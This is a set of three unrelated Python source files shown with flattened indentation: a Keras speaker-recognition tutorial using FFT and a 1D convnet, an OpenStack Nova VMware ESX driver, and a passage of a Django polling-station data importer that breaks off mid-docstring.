Last modified: 03/07/2020
Description: Classify speakers using Fast Fourier Transform (FFT) and a 1D Convnet.
"""
"""
## Introduction
This example demonstrates how to create a model to classify speakers from the
frequency domain representation of speech recordings, obtained via Fast Fourier
Transform (FFT).
It shows the following:
- How to use `tf.data` to load, preprocess and feed audio streams into a model
- How to create a 1D convolutional network with residual
connections for audio classification.
Our process:
- We prepare a dataset of speech samples from different speakers, with the speaker as label.
- We add background noise to these samples to augment our data.
- We take the FFT of these samples.
- We train a 1D convnet to predict the correct speaker given a noisy FFT speech sample.
Note:
- This example should be run with TensorFlow 2.3 or higher, or `tf-nightly`.
- The noise samples in the dataset need to be resampled to a sampling rate of 16000 Hz
before using the code in this example. In order to do this, you will need to have
installed `ffmpg`.
"""
"""
## Setup
"""
import os
import shutil
import numpy as np
import tensorflow as tf
from tensorflow import keras
from pathlib import Path
from IPython.display import display, Audio
# Get the data from https://www.kaggle.com/kongaevans/speaker-recognition-dataset/download
# and save it to the 'Downloads' folder in your HOME directory
DATASET_ROOT = os.path.join(os.path.expanduser("~"), "Downloads/16000_pcm_speeches")
# The folders in which we will put the audio samples and the noise samples
AUDIO_SUBFOLDER = "audio"
NOISE_SUBFOLDER = "noise"
DATASET_AUDIO_PATH = os.path.join(DATASET_ROOT, AUDIO_SUBFOLDER)
DATASET_NOISE_PATH = os.path.join(DATASET_ROOT, NOISE_SUBFOLDER)
# Percentage of samples to use for validation
VALID_SPLIT = 0.1
# Seed to use when shuffling the dataset and the noise
SHUFFLE_SEED = 43
# The sampling rate to use.
# This is the one used in all of the audio samples.
# We will resample all of the noise to this sampling rate.
# This will also be the output size of the audio wave samples
# (since all samples are of 1 second long)
SAMPLING_RATE = 16000
# The factor to multiply the noise with according to:
# noisy_sample = sample + noise * prop * scale
# where prop = sample_amplitude / noise_amplitude
SCALE = 0.5
BATCH_SIZE = 128
EPOCHS = 100
"""
## Data preparation
The dataset is composed of 7 folders, divided into 2 groups:
- Speech samples, with 5 folders for 5 different speakers. Each folder contains
1500 audio files, each 1 second long and sampled at 16000 Hz.
- Background noise samples, with 2 folders and a total of 6 files. These files
are longer than 1 second (and originally not sampled at 16000 Hz, but we will resample them to 16000 Hz).
We will use those 6 files to create 354 1-second-long noise samples to be used for training.
Let's sort these 2 categories into 2 folders:
- An `audio` folder which will contain all the per-speaker speech sample folders
- A `noise` folder which will contain all the noise samples
"""
"""
Before sorting the audio and noise categories into 2 folders,
we have the following directory structure:
```
main_directory/
...speaker_a/
...speaker_b/
...speaker_c/
...speaker_d/
...speaker_e/
...other/
..._background_noise_/
```
After sorting, we end up with the following structure:
```
main_directory/
...audio/
......speaker_a/
......speaker_b/
......speaker_c/
......speaker_d/
......speaker_e/
...noise/
......other/
......_background_noise_/
```
"""
# If folder `audio`, does not exist, create it, otherwise do nothing
if os.path.exists(DATASET_AUDIO_PATH) is False:
os.makedirs(DATASET_AUDIO_PATH)
# If folder `noise`, does not exist, create it, otherwise do nothing
if os.path.exists(DATASET_NOISE_PATH) is False:
os.makedirs(DATASET_NOISE_PATH)
for folder in os.listdir(DATASET_ROOT):
if os.path.isdir(os.path.join(DATASET_ROOT, folder)):
if folder in [AUDIO_SUBFOLDER, NOISE_SUBFOLDER]:
# If folder is `audio` or `noise`, do nothing
continue
elif folder in ["other", "_background_noise_"]:
# If folder is one of the folders that contains noise samples,
# move it to the `noise` folder
shutil.move(
os.path.join(DATASET_ROOT, folder),
os.path.join(DATASET_NOISE_PATH, folder),
)
else:
# Otherwise, it should be a speaker folder, then move it to
# `audio` folder
shutil.move(
os.path.join(DATASET_ROOT, folder),
os.path.join(DATASET_AUDIO_PATH, folder),
)
"""
## Noise preparation
In this section:
- We load all noise samples (which should have been resampled to 16000)
- We split those noise samples to chuncks of 16000 samples which
correspond to 1 second duration each
"""
# Get the list of all noise files
noise_paths = []
for subdir in os.listdir(DATASET_NOISE_PATH):
subdir_path = Path(DATASET_NOISE_PATH) / subdir
if os.path.isdir(subdir_path):
noise_paths += [
os.path.join(subdir_path, filepath)
for filepath in os.listdir(subdir_path)
if filepath.endswith(".wav")
]
print(
"Found {} files belonging to {} directories".format(
len(noise_paths), len(os.listdir(DATASET_NOISE_PATH))
)
)
"""
Resample all noise samples to 16000 Hz
"""
command = (
"for dir in `ls -1 " + DATASET_NOISE_PATH + "`; do "
"for file in `ls -1 " + DATASET_NOISE_PATH + "/$dir/*.wav`; do "
"sample_rate=`ffprobe -hide_banner -loglevel panic -show_streams "
"$file | grep sample_rate | cut -f2 -d=`; "
"if [ $sample_rate -ne 16000 ]; then "
"ffmpeg -hide_banner -loglevel panic -y "
"-i $file -ar 16000 temp.wav; "
"mv temp.wav $file; "
"fi; done; done"
)
os.system(command)
# Split noise into chunks of 16,000 steps each
def load_noise_sample(path):
sample, sampling_rate = tf.audio.decode_wav(
tf.io.read_file(path), desired_channels=1
)
if sampling_rate == SAMPLING_RATE:
# Number of slices of 16000 each that can be generated from the noise sample
slices = int(sample.shape[0] / SAMPLING_RATE)
sample = tf.split(sample[: slices * SAMPLING_RATE], slices)
return sample
else:
print("Sampling rate for {} is incorrect. Ignoring it".format(path))
return None
noises = []
for path in noise_paths:
sample = load_noise_sample(path)
if sample:
noises.extend(sample)
noises = tf.stack(noises)
print(
"{} noise files were split into {} noise samples where each is {} sec. long".format(
len(noise_paths), noises.shape[0], noises.shape[1] // SAMPLING_RATE
)
)
"""
## Dataset generation
"""
def paths_and_labels_to_dataset(audio_paths, labels):
"""Constructs a dataset of audios and labels."""
path_ds = tf.data.Dataset.from_tensor_slices(audio_paths)
audio_ds = path_ds.map(
lambda x: path_to_audio(x), num_parallel_calls=tf.data.AUTOTUNE
)
label_ds = tf.data.Dataset.from_tensor_slices(labels)
return tf.data.Dataset.zip((audio_ds, label_ds))
def path_to_audio(path):
"""Reads and decodes an audio file."""
audio = tf.io.read_file(path)
audio, _ = tf.audio.decode_wav(audio, 1, SAMPLING_RATE)
return audio
def add_noise(audio, noises=None, scale=0.5):
if noises is not None:
# Create a random tensor of the same size as audio ranging from
# 0 to the number of noise stream samples that we have.
tf_rnd = tf.random.uniform(
(tf.shape(audio)[0],), 0, noises.shape[0], dtype=tf.int32
)
noise = tf.gather(noises, tf_rnd, axis=0)
# Get the amplitude proportion between the audio and the noise
prop = tf.math.reduce_max(audio, axis=1) / tf.math.reduce_max(noise, axis=1)
prop = tf.repeat(tf.expand_dims(prop, axis=1), tf.shape(audio)[1], axis=1)
# Adding the rescaled noise to audio
audio = audio + noise * prop * scale
return audio
def audio_to_fft(audio):
# Since tf.signal.fft applies FFT on the innermost dimension,
# we need to squeeze the dimensions and then expand them again
# after FFT
audio = tf.squeeze(audio, axis=-1)
fft = tf.signal.fft(
tf.cast(tf.complex(real=audio, imag=tf.zeros_like(audio)), tf.complex64)
)
fft = tf.expand_dims(fft, axis=-1)
# Return the absolute value of the first half of the FFT
# which represents the positive frequencies
return tf.math.abs(fft[:, : (audio.shape[1] // 2), :])
# Get the list of audio file paths along with their corresponding labels
class_names = os.listdir(DATASET_AUDIO_PATH)
print("Our class names: {}".format(class_names,))
audio_paths = []
labels = []
for label, name in enumerate(class_names):
print("Processing speaker {}".format(name,))
dir_path = Path(DATASET_AUDIO_PATH) / name
speaker_sample_paths = [
os.path.join(dir_path, filepath)
for filepath in os.listdir(dir_path)
if filepath.endswith(".wav")
]
audio_paths += speaker_sample_paths
labels += [label] * len(speaker_sample_paths)
print(
"Found {} files belonging to {} classes.".format(len(audio_paths), len(class_names))
)
# Shuffle
rng = np.random.RandomState(SHUFFLE_SEED)
rng.shuffle(audio_paths)
rng = np.random.RandomState(SHUFFLE_SEED)
rng.shuffle(labels)
# Split into training and validation
num_val_samples = int(VALID_SPLIT * len(audio_paths))
print("Using {} files for training.".format(len(audio_paths) - num_val_samples))
train_audio_paths = audio_paths[:-num_val_samples]
train_labels = labels[:-num_val_samples]
print("Using {} files for validation.".format(num_val_samples))
valid_audio_paths = audio_paths[-num_val_samples:]
valid_labels = labels[-num_val_samples:]
# Create 2 datasets, one for training and the other for validation
train_ds = paths_and_labels_to_dataset(train_audio_paths, train_labels)
train_ds = train_ds.shuffle(buffer_size=BATCH_SIZE * 8, seed=SHUFFLE_SEED).batch(
BATCH_SIZE
)
valid_ds = paths_and_labels_to_dataset(valid_audio_paths, valid_labels)
valid_ds = valid_ds.shuffle(buffer_size=32 * 8, seed=SHUFFLE_SEED).batch(32)
# Add noise to the training set
train_ds = train_ds.map(
lambda x, y: (add_noise(x, noises, scale=SCALE), y),
num_parallel_calls=tf.data.AUTOTUNE,
)
# Transform audio wave to the frequency domain using `audio_to_fft`
train_ds = train_ds.map(
lambda x, y: (audio_to_fft(x), y), num_parallel_calls=tf.data.AUTOTUNE
)
train_ds = train_ds.prefetch(tf.data.AUTOTUNE)
valid_ds = valid_ds.map(
lambda x, y: (audio_to_fft(x), y), num_parallel_calls=tf.data.AUTOTUNE
)
valid_ds = valid_ds.prefetch(tf.data.AUTOTUNE)
"""
## Model Definition
"""
def residual_block(x, filters, conv_num=3, activation="relu"):
# Shortcut
s = keras.layers.Conv1D(filters, 1, padding="same")(x)
for i in range(conv_num - 1):
x = keras.layers.Conv1D(filters, 3, padding="same")(x)
x = keras.layers.Activation(activation)(x)
x = keras.layers.Conv1D(filters, 3, padding="same")(x)
x = keras.layers.Add()([x, s])
x = keras.layers.Activation(activation)(x)
return keras.layers.MaxPool1D(pool_size=2, strides=2)(x)
def build_model(input_shape, num_classes):
inputs = keras.layers.Input(shape=input_shape, name="input")
x = residual_block(inputs, 16, 2)
x = residual_block(x, 32, 2)
x = residual_block(x, 64, 3)
x = residual_block(x, 128, 3)
x = residual_block(x, 128, 3)
x = keras.layers.AveragePooling1D(pool_size=3, strides=3)(x)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(256, activation="relu")(x)
x = keras.layers.Dense(128, activation="relu")(x)
outputs = keras.layers.Dense(num_classes, activation="softmax", name="output")(x)
return keras.models.Model(inputs=inputs, outputs=outputs)
model = build_model((SAMPLING_RATE // 2, 1), len(class_names))
model.summary()
# Compile the model using Adam's default learning rate
model.compile(
optimizer="Adam", loss="sparse_categorical_crossentropy", metrics=["accuracy"]
)
# Add callbacks:
# 'EarlyStopping' to stop training when the model is not enhancing anymore
# 'ModelCheckPoint' to always keep the model that has the best val_accuracy
model_save_filename = "model.h5"
earlystopping_cb = keras.callbacks.EarlyStopping(patience=10, restore_best_weights=True)
mdlcheckpoint_cb = keras.callbacks.ModelCheckpoint(
model_save_filename, monitor="val_accuracy", save_best_only=True
)
"""
## Training
"""
history = model.fit(
train_ds,
epochs=EPOCHS,
validation_data=valid_ds,
callbacks=[earlystopping_cb, mdlcheckpoint_cb],
)
"""
## Evaluation
"""
print(model.evaluate(valid_ds))
"""
We get ~ 98% validation accuracy.
"""
"""
## Demonstration
Let's take some samples and:
- Predict the speaker
- Compare the prediction with the real speaker
- Listen to the audio to see that despite the samples being noisy,
the model is still pretty accurate
"""
SAMPLES_TO_DISPLAY = 10
test_ds = paths_and_labels_to_dataset(valid_audio_paths, valid_labels)
test_ds = test_ds.shuffle(buffer_size=BATCH_SIZE * 8, seed=SHUFFLE_SEED).batch(
BATCH_SIZE
)
test_ds = test_ds.map(
lambda x, y: (add_noise(x, noises, scale=SCALE), y),
num_parallel_calls=tf.data.AUTOTUNE,
)
for audios, labels in test_ds.take(1):
# Get the signal FFT
ffts = audio_to_fft(audios)
# Predict
y_pred = model.predict(ffts)
# Take random samples
rnd = np.random.randint(0, BATCH_SIZE, SAMPLES_TO_DISPLAY)
audios = audios.numpy()[rnd, :, :]
labels = labels.numpy()[rnd]
y_pred = np.argmax(y_pred, axis=-1)[rnd]
for index in range(SAMPLES_TO_DISPLAY):
# For every sample, print the true and predicted label
# as well as run the voice with the noise
print(
"Speaker:\33{} {}\33[0m\tPredicted:\33{} {}\33[0m".format(
"[92m" if labels[index] == y_pred[index] else "[91m",
class_names[labels[index]],
"[92m" if labels[index] == y_pred[index] else "[91m",
class_names[y_pred[index]],
)
)
display(Audio(audios[index, :, :].squeeze(), rate=SAMPLING_RATE))
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 Citrix Systems, Inc.
# Copyright 2011 OpenStack LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A connection to the VMware ESX platform.
**Related Flags**
:vmwareapi_host_ip: IPAddress of VMware ESX server.
:vmwareapi_host_username: Username for connection to VMware ESX Server.
:vmwareapi_host_password: Password for connection to VMware ESX Server.
:vmwareapi_task_poll_interval: The interval (seconds) used for polling of
remote tasks
(default: 1.0).
:vmwareapi_api_retry_count: The API retry count in case of failure such as
network failures (socket errors etc.)
(default: 10).
"""
import time
from eventlet import event
from nova import context
from nova import db
from nova import exception
from nova import flags
from nova import log as logging
from nova.openstack.common import cfg
from nova import utils
from nova.virt import driver
from nova.virt.vmwareapi import error_util
from nova.virt.vmwareapi import vim
from nova.virt.vmwareapi import vim_util
from nova.virt.vmwareapi import vmops
LOG = logging.getLogger(__name__)
vmwareapi_opts = [
cfg.StrOpt('vmwareapi_host_ip',
default=None,
help='URL for connection to VMWare ESX host.Required if '
'connection_type is vmwareapi.'),
cfg.StrOpt('vmwareapi_host_username',
default=None,
help='Username for connection to VMWare ESX host. '
'Used only if connection_type is vmwareapi.'),
cfg.StrOpt('vmwareapi_host_password',
default=None,
help='Password for connection to VMWare ESX host. '
'Used only if connection_type is vmwareapi.'),
cfg.FloatOpt('vmwareapi_task_poll_interval',
default=5.0,
help='The interval used for polling of remote tasks. '
'Used only if connection_type is vmwareapi'),
cfg.FloatOpt('vmwareapi_api_retry_count',
default=10,
help='The number of times we retry on failures, e.g., '
'socket error, etc. '
'Used only if connection_type is vmwareapi'),
cfg.StrOpt('vmwareapi_vlan_interface',
default='vmnic0',
help='Physical ethernet adapter name for vlan networking'),
]
FLAGS = flags.FLAGS
FLAGS.register_opts(vmwareapi_opts)
TIME_BETWEEN_API_CALL_RETRIES = 2.0
class Failure(Exception):
"""Base Exception class for handling task failures."""
def __init__(self, details):
self.details = details
def __str__(self):
return str(self.details)
def get_connection(_read_only):
"""Sets up the ESX host connection."""
host_ip = FLAGS.vmwareapi_host_ip
host_username = FLAGS.vmwareapi_host_username
host_password = FLAGS.vmwareapi_host_password
api_retry_count = FLAGS.vmwareapi_api_retry_count
if not host_ip or host_username is None or host_password is None:
raise Exception(_("Must specify vmwareapi_host_ip,"
"vmwareapi_host_username "
"and vmwareapi_host_password to use"
"connection_type=vmwareapi"))
return VMWareESXConnection(host_ip, host_username, host_password,
api_retry_count)
class VMWareESXConnection(driver.ComputeDriver):
"""The ESX host connection object."""
def __init__(self, host_ip, host_username, host_password,
api_retry_count, scheme="https"):
super(VMWareESXConnection, self).__init__()
session = VMWareAPISession(host_ip, host_username, host_password,
api_retry_count, scheme=scheme)
self._vmops = vmops.VMWareVMOps(session)
def init_host(self, host):
"""Do the initialization that needs to be done."""
# FIXME(sateesh): implement this
pass
def list_instances(self):
"""List VM instances."""
return self._vmops.list_instances()
def spawn(self, context, instance, image_meta, network_info,
block_device_mapping=None):
"""Create VM instance."""
self._vmops.spawn(context, instance, image_meta, network_info)
def snapshot(self, context, instance, name):
"""Create snapshot from a running VM instance."""
self._vmops.snapshot(context, instance, name)
def reboot(self, instance, network_info, reboot_type):
"""Reboot VM instance."""
self._vmops.reboot(instance, network_info)
def destroy(self, instance, network_info, block_device_info=None):
"""Destroy VM instance."""
self._vmops.destroy(instance, network_info)
def pause(self, instance):
"""Pause VM instance."""
self._vmops.pause(instance)
def unpause(self, instance):
"""Unpause paused VM instance."""
self._vmops.unpause(instance)
def suspend(self, instance):
"""Suspend the specified instance."""
self._vmops.suspend(instance)
def resume(self, instance):
"""Resume the suspended VM instance."""
self._vmops.resume(instance)
def get_info(self, instance):
"""Return info about the VM instance."""
return self._vmops.get_info(instance)
def get_diagnostics(self, instance):
"""Return data about VM diagnostics."""
return self._vmops.get_info(instance)
def get_console_output(self, instance):
"""Return snapshot of console."""
return self._vmops.get_console_output(instance)
def get_volume_connector(self, _instance):
"""Return volume connector information"""
# TODO(vish): When volume attaching is supported, return the
# proper initiator iqn.
return {
'ip': FLAGS.vmwareapi_host_ip,
'initiator': None
}
def attach_volume(self, connection_info, instance_name, mountpoint):
"""Attach volume storage to VM instance."""
pass
def detach_volume(self, connection_info, instance_name, mountpoint):
"""Detach volume storage to VM instance."""
pass
def get_console_pool_info(self, console_type):
"""Get info about the host on which the VM resides."""
return {'address': FLAGS.vmwareapi_host_ip,
'username': FLAGS.vmwareapi_host_username,
'password': FLAGS.vmwareapi_host_password}
def update_available_resource(self, ctxt, host):
"""This method is supported only by libvirt."""
return
def host_power_action(self, host, action):
"""Reboots, shuts down or powers up the host."""
raise NotImplementedError()
def host_maintenance_mode(self, host, mode):
"""Start/Stop host maintenance window. On start, it triggers
guest VMs evacuation."""
raise NotImplementedError()
def set_host_enabled(self, host, enabled):
"""Sets the specified host's ability to accept new instances."""
raise NotImplementedError()
def plug_vifs(self, instance, network_info):
"""Plug VIFs into networks."""
self._vmops.plug_vifs(instance, network_info)
def unplug_vifs(self, instance, network_info):
"""Unplug VIFs from networks."""
self._vmops.unplug_vifs(instance, network_info)
class VMWareAPISession(object):
"""
Sets up a session with the ESX host and handles all
the calls made to the host.
"""
def __init__(self, host_ip, host_username, host_password,
api_retry_count, scheme="https"):
self._host_ip = host_ip
self._host_username = host_username
self._host_password = host_password
self.api_retry_count = api_retry_count
self._scheme = scheme
self._session_id = None
self.vim = None
self._create_session()
def _get_vim_object(self):
"""Create the VIM Object instance."""
return vim.Vim(protocol=self._scheme, host=self._host_ip)
def _create_session(self):
"""Creates a session with the ESX host."""
while True:
try:
# Login and setup the session with the ESX host for making
# API calls
self.vim = self._get_vim_object()
session = self.vim.Login(
self.vim.get_service_content().sessionManager,
userName=self._host_username,
password=self._host_password)
# Terminate the earlier session, if possible ( For the sake of
# preserving sessions as there is a limit to the number of
# sessions we can have )
if self._session_id:
try:
self.vim.TerminateSession(
self.vim.get_service_content().sessionManager,
sessionId=[self._session_id])
except Exception, excep:
# This exception is something we can live with. It is
# just an extra caution on our side. The session may
# have been cleared. We could have made a call to
# SessionIsActive, but that is an overhead because we
# anyway would have to call TerminateSession.
LOG.debug(excep)
self._session_id = session.key
return
except Exception, excep:
LOG.critical(_("In vmwareapi:_create_session, "
"got this exception: %s") % excep)
raise exception.Error(excep)
def __del__(self):
"""Logs-out the session."""
# Logout to avoid un-necessary increase in session count at the
# ESX host
try:
self.vim.Logout(self.vim.get_service_content().sessionManager)
except Exception, excep:
# It is just cautionary on our part to do a logout in del just
# to ensure that the session is not left active.
LOG.debug(excep)
def _is_vim_object(self, module):
"""Check if the module is a VIM Object instance."""
return isinstance(module, vim.Vim)
def _call_method(self, module, method, *args, **kwargs):
"""
Calls a method within the module specified with
args provided.
"""
args = list(args)
retry_count = 0
exc = None
last_fault_list = []
while True:
try:
if not self._is_vim_object(module):
# If it is not the first try, then get the latest
# vim object
if retry_count > 0:
args = args[1:]
args = [self.vim] + args
retry_count += 1
temp_module = module
for method_elem in method.split("."):
temp_module = getattr(temp_module, method_elem)
return temp_module(*args, **kwargs)
except error_util.VimFaultException, excep:
# If it is a Session Fault Exception, it may point
# to a session gone bad. So we try re-creating a session
# and then proceeding ahead with the call.
exc = excep
if error_util.FAULT_NOT_AUTHENTICATED in excep.fault_list:
# Because of the idle session returning an empty
# RetrievePropertiesResponse and also the same is returned
# when there is say empty answer to the query for
# VMs on the host ( as in no VMs on the host), we have no
# way to differentiate.
# So if the previous response was also am empty response
# and after creating a new session, we get the same empty
# response, then we are sure of the response being supposed
# to be empty.
if error_util.FAULT_NOT_AUTHENTICATED in last_fault_list:
return []
last_fault_list = excep.fault_list
self._create_session()
else:
# No re-trying for errors for API call has gone through
# and is the caller's fault. Caller should handle these
# errors. e.g, InvalidArgument fault.
break
except error_util.SessionOverLoadException, excep:
# For exceptions which may come because of session overload,
# we retry
exc = excep
except Exception, excep:
# If it is a proper exception, say not having furnished
# proper data in the SOAP call or the retry limit having
# exceeded, we raise the exception
exc = excep
break
# If retry count has been reached then break and
# raise the exception
if retry_count > self.api_retry_count:
break
time.sleep(TIME_BETWEEN_API_CALL_RETRIES)
LOG.critical(_("In vmwareapi:_call_method, "
"got this exception: %s") % exc)
raise
def _get_vim(self):
"""Gets the VIM object reference."""
if self.vim is None:
self._create_session()
return self.vim
def _wait_for_task(self, instance_uuid, task_ref):
"""
Return a Deferred that will give the result of the given task.
The task is polled until it completes.
"""
done = event.Event()
loop = utils.LoopingCall(self._poll_task, instance_uuid, task_ref,
done)
loop.start(FLAGS.vmwareapi_task_poll_interval)
ret_val = done.wait()
loop.stop()
return ret_val
def _poll_task(self, instance_uuid, task_ref, done):
"""
Poll the given task, and fires the given Deferred if we
get a result.
"""
try:
task_info = self._call_method(vim_util, "get_dynamic_property",
task_ref, "Task", "info")
task_name = task_info.name
action = dict(
instance_uuid=instance_uuid,
action=task_name[0:255],
error=None)
if task_info.state in ['queued', 'running']:
return
elif task_info.state == 'success':
LOG.debug(_("Task [%(task_name)s] %(task_ref)s "
"status: success") % locals())
done.send("success")
else:
error_info = str(task_info.error.localizedMessage)
action["error"] = error_info
LOG.warn(_("Task [%(task_name)s] %(task_ref)s "
"status: error %(error_info)s") % locals())
done.send_exception(exception.Error(error_info))
db.instance_action_create(context.get_admin_context(), action)
except Exception, excep:
LOG.warn(_("In vmwareapi:_poll_task, Got this error %s") % excep)
done.send_exception(excep)
| |
"""
Defines the base importer classes to implement
"""
import abc
import json
import glob
import logging
import os
import tempfile
import urllib.request
import rtree
from django.apps import apps
from django.contrib.gis import geos
from django.core.management.base import BaseCommand
from django.conf import settings
from django.contrib.gis.geos import Point, GEOSGeometry, GEOSException
from addressbase.models import UprnToCouncil
from councils.models import Council
from data_importers.data_types import AddressList, DistrictSet, StationSet
from data_importers.data_quality_report import (
DataQualityReportBuilder,
StationReport,
DistrictReport,
AddressReport,
)
from data_importers.contexthelpers import Dwellings
from data_importers.filehelpers import FileHelperFactory
from data_importers.loghelper import LogHelper
from data_importers.s3wrapper import S3Wrapper
from pollingstations.models import PollingDistrict, PollingStation
from data_importers.models import DataQuality
class CsvMixin:
csv_encoding = "utf-8"
csv_delimiter = ","
def get_csv_options(self):
return {"csv_encoding": self.csv_encoding, "csv_delimiter": self.csv_delimiter}
class ShpMixin:
shp_encoding = "utf-8"
def get_shp_options(self):
return {"shp_encoding": self.shp_encoding}
class BaseImporter(BaseCommand, metaclass=abc.ABCMeta):
"""
Turn off auto system check for all apps
We will manually run system checks only for the
'data_importers' and 'pollingstations' apps
"""
requires_system_checks = []
srid = 27700
council_id = None
base_folder_path = None
logger = None
batch_size = None
imports_districts = False
use_postcode_centroids = False
def write_info(self, message):
if self.verbosity > 0:
self.stdout.write(message)
def add_arguments(self, parser):
parser.add_argument(
"--nochecks",
help="<Optional> Do not perform validation checks or display context information",
action="store_true",
required=False,
default=False,
)
parser.add_argument(
"-p",
"--use-postcode-centroids",
help="<optional> Use postcode centroids to derive a location for polling stations",
action="store_true",
required=False,
default=False,
)
def teardown(self, council):
PollingStation.objects.filter(council=council).delete()
PollingDistrict.objects.filter(council=council).delete()
UprnToCouncil.objects.filter(lad__in=council.identifiers).update(
polling_station_id=""
)
def get_council(self, council_id):
return Council.objects.get(pk=council_id)
def get_data(self, filetype, filename):
options = {}
if hasattr(self, "get_csv_options"):
options.update(self.get_csv_options())
if hasattr(self, "get_shp_options"):
options.update(self.get_shp_options())
helper = FileHelperFactory.create(filetype, filename, options)
return helper.get_features()
def get_srid(self, type=None):
if (
hasattr(self, "districts_srid")
and type == "districts"
and self.districts_srid is not None
):
return self.districts_srid
else:
return self.srid
@abc.abstractmethod
def import_data(self):
pass
def post_import(self):
raise NotImplementedError
def report(self):
# build report
if hasattr(self, "csv_row_count"):
report = DataQualityReportBuilder(
self.council.pk,
expecting_districts=self.imports_districts,
csv_rows=self.csv_row_count,
)
else:
report = DataQualityReportBuilder(
self.council.pk, expecting_districts=self.imports_districts
)
station_report = StationReport(self.council.pk)
district_report = DistrictReport(self.council.pk)
address_report = AddressReport(self.council.pk)
report.build_report()
# save a static copy in the DB that we can serve up on the website
record = DataQuality.objects.get_or_create(council_id=self.council.pk)
record[0].report = report.generate_string_report()
record[0].num_stations = station_report.get_stations_imported()
record[0].num_districts = district_report.get_districts_imported()
record[0].num_addresses = address_report.get_addresses_with_station_id()
record[0].save()
# output to console
report.output_console_report()
@property
def data_path(self):
if getattr(settings, "PRIVATE_DATA_PATH", None):
path = settings.PRIVATE_DATA_PATH
else:
s3 = S3Wrapper()
s3.fetch_data_by_council(self.council_id)
path = s3.data_path
return os.path.abspath(path)
def get_base_folder_path(self):
if getattr(self, "local_files", True):
if self.base_folder_path is None:
path = os.path.join(self.data_path, self.council_id)
return glob.glob(path)[0]
return self.base_folder_path
def handle(self, *args, **kwargs):
"""
Manually run system checks for the
'data_importers' and 'pollingstations' apps
Management commands can ignore checks that only apply to
the apps supporting the website part of the project
"""
self.check(
[
apps.get_app_config("data_importers"),
apps.get_app_config("pollingstations"),
]
)
self.verbosity = kwargs.get("verbosity")
self.logger = LogHelper(self.verbosity)
self.validation_checks = not (kwargs.get("nochecks"))
self.allow_station_point_from_postcode = kwargs.get("use_postcode_centroids")
if self.council_id is None:
self.council_id = args[0]
self.council = self.get_council(self.council_id)
self.write_info("Importing data for %s..." % self.council.name)
# Delete old data for this council
self.teardown(self.council)
self.base_folder_path = self.get_base_folder_path()
self.import_data()
# Optional step for post import tasks
try:
self.post_import()
except NotImplementedError:
pass
# save and output data quality report
if self.verbosity > 0:
self.report()
class BaseStationsImporter(BaseImporter, metaclass=abc.ABCMeta):
stations = None
@property
@abc.abstractmethod
def stations_filetype(self):
pass
@property
@abc.abstractmethod
def stations_name(self):
pass
def get_stations(self):
stations_file = os.path.join(self.base_folder_path, self.stations_name)
return self.get_data(self.stations_filetype, stations_file)
@abc.abstractmethod
def station_record_to_dict(self, record):
pass
def get_station_hash(self, station):
raise NotImplementedError
def check_station_point(self, station_record):
if station_record["location"]:
self.check_in_council_bounds(station_record)
self.check_duplicate_location(station_record)
def check_duplicate_location(self, station_record):
stations_with_location_and_different_postcode = [
s
for s in self.stations.elements
if s.location and (s.postcode != station_record["postcode"])
]
if not stations_with_location_and_different_postcode:
return
srids = [
GEOSGeometry(s.location).srid
for s in stations_with_location_and_different_postcode
]
srid_to_use = max(srids, key=srids.count)
if srid_to_use == 4326:
threshold = 0.001
if srid_to_use == 27700:
threshold = 10
station_index = rtree.index.Index()
for i, station in enumerate(stations_with_location_and_different_postcode):
geom = GEOSGeometry(station.location).transform(srid_to_use, clone=True)
station_index.insert(i, (geom.x, geom.y, geom.x, geom.y))
record_geom = station_record["location"].transform(srid_to_use, clone=True)
nearest_ids = list(
station_index.intersection(
(
record_geom.x - threshold,
record_geom.y - threshold,
record_geom.x + threshold,
record_geom.y + threshold,
),
1,
)
)
if not nearest_ids:
return
for i in nearest_ids:
station = stations_with_location_and_different_postcode[i.id]
def get_name(address):
return " ".join(address.split("\n")[:2])
self.logger.log_message(
logging.WARNING,
f"Polling stations '{get_name(station_record['address'])}' and "
f"'{get_name(station.address)}' "
"are at approximately the same location, but have different postcodes:\n"
f"qgis filter exp: \"internal_council_id\" IN ('{station_record['internal_council_id']}','{station.internal_council_id}')", # qgis filter expression
)
def check_in_council_bounds(self, station_record):
try:
council = Council.objects.get(
geography__geography__covers=station_record["location"]
)
if self.council_id != council.council_id:
self.logger.log_message(
logging.WARNING,
f"Polling station {station_record['internal_council_id']} is in {council.name} ({council.council_id}) "
f"but target council is {self.council.name} ({self.council.council_id}) - manual check recommended\n",
)
except Council.DoesNotExist:
self.logger.log_message(
logging.WARNING,
"Polling station %s is not covered by any council area - manual check recommended\n",
variable=(station_record["internal_council_id"]),
)
def import_polling_stations(self):
stations = self.get_stations()
if not isinstance(self, BaseAddressesImporter):
self.write_info(
"Stations: Found %i features in input file" % (len(stations))
)
seen = set()
for station in stations:
"""
We can optionally define a function get_station_hash()
This is useful if residential addresses and polling
station details are embedded in the same input file
We can use this to avoid calling station_record_to_dict()
(which is potentially quite a slow operation)
on a record where we have already processed the station data
to make the import process run more quickly.
"""
try:
station_hash = self.get_station_hash(station)
if station_hash in seen:
continue
else:
self.logger.log_message(
logging.INFO,
"Polling station added to set:\n%s",
variable=station,
pretty=True,
)
seen.add(station_hash)
except NotImplementedError:
pass
if self.stations_filetype in ["shp", "shp.zip"]:
record = station.record
else:
record = station
station_info = self.station_record_to_dict(record)
"""
station_record_to_dict() will usually return a dict
but it may also optionally return a list of dicts.
This is helpful if we encounter a polling station record
with a delimited list of polling districts served by this
polling station: it allows us to add the same station
address/point many times with different district ids.
"""
if isinstance(station_info, list):
self.logger.log_message(
logging.INFO,
"station_record_to_dict() returned list with input:\n%s",
variable=record,
pretty=True,
)
station_records = station_info
else:
# If station_info is a dict, create a singleton list
station_records = [station_info]
for station_record in station_records:
"""
station_record_to_dict() may optionally return None
if we want to exclude a particular station record
from being imported
"""
if station_record is None:
self.logger.log_message(
logging.INFO,
"station_record_to_dict() returned None with input:\n%s",
variable=record,
pretty=True,
)
continue
if "council" not in station_record:
station_record["council"] = self.council
"""
If the file type is shp, we can usually derive 'location'
automatically, but we can return it if necessary.
